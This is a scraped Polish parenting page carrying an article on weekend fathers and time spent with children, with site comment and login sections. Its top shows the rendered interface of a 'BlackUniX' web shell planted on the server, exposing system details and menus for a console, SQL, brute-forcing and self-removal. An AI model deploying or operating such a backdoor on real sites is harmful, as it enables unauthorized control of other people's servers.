W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 19:17:50
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.92.150.98
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Statystyczny ojciec vs. Weekendowy tata
03.11.2008.
Czytamy o tym jak to statystyczny ojciec w Australii spędza z dzieckiem minutę dziennie, w Europie sytuacja (jak podają media) wygląda „lepiej” to znaczy ojcowie spędzają po kilka minut dziennie ze swoimi pociechami! A TY? Jeżeli jesteś weekendowym tatą walczysz o każdą chwilę, okazję gdy możesz być z dzieckiem. Z pewnością statystyczny tata spędza MNIEJ czasu z dzieckiem niż Ty.
Nie chodzi o to by równać w dół, porównywać się z gorszymi, warto zamiast zadręczania się tym jak mało jesteśmy ze swoimi dziećmi pomyśleć o tym ile nam się udaje wspólnie przeżyć szczęśliwych chwil.
To zrozumiałe, że chcielibyśmy znaleźć się w sytuacji, gdy po rozstaniu z partnerką nie jesteśmy zmuszeni rozstawać się z naszym dzieckiem. Niestety wciąż prawdą jest to, że gdy rozstają się rodzice to niejako automatycznie ojcowie tracą kontakt z dzieckiem. To co w tym wszystkim jest pocieszające to to, że weekendowy tata docenia radość z chwil spędzonych z dzieckiem, „tygodniowy” tata nie zawsze.
Weekendowy tata w przeciwieństwie do „tygodniowego” taty:
* Stara się być z dzieckiem jak najwięcej
* Jest świadomy swojej miłości i przywiązania do dziecka.
Nie każdy „tygodniowy” tata musi stać się weekendowym by zrozumieć to jak zależy mu na swoich dzieciach, lecz częste jest to, że dopiero po utracie kontaktu, możliwości patrzenia jak maluch rośnie i się rozwija rozumiemy to jak ważna dla nas są nasze dzieci.
Wiadomo, że najkorzystniejsze dla dziecka jest to gdy dorasta w pełnej i SZCZĘŚLIWEJ rodzinie. Nikomu nie wychodzi na dobre gdy maluch widzi cały czas kłócących się rodziców. Tak samo jest gdy jedynym powodem dla którego związek wciąż trwa jest „dobro dziecka”. O jakim „dobry dziecka” tutaj mówić? Niezdrowe relacje w domu z pewnością nie pomagają dziecko prawidłowo się rozwijać.
Maluch widujący ojca w weekendy może być zdecydowanie bardziej szczęśliwym człowiekiem niż dziecko mieszkające na stałe z ojcem, który pozostaje w nieustającym konflikcie z matką dziecka.
Weekendowy tato zawyżaj dalej statystyki i staraj się by twoje relacje z dzieckiem nie tylko statystycznie ale również realnie był bliskie, pełne miłości i szczerości! Powodzenia

Dota Szymborska
Redaktor naczelna portalu www.wczesnaedukacja.com
 
następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 2 gości
22.06.2018.